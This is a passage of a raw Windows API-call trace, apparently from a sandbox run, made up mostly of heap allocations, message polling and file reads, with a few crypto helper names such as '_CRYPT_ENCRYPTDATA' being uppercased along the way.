[0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0113.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0113.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0113.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0113.011] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0113.011] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0113.014] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x2464, lpOverlapped=0x0) returned 1 [0113.014] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0113.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12464) returned 0x4516010 [0113.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0113.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12464) returned 0x4528480 [0113.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.020] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12464) returned 0x4516010 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.020] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0113.020] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0113.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0113.020] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0113.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12464) returned 0x4516010 [0113.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12464) returned 0x499a008 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0113.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0113.024] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0113.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0113.024] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0113.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.025] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0113.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.025] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0113.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0113.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.026] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.027] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0113.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0113.028] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, 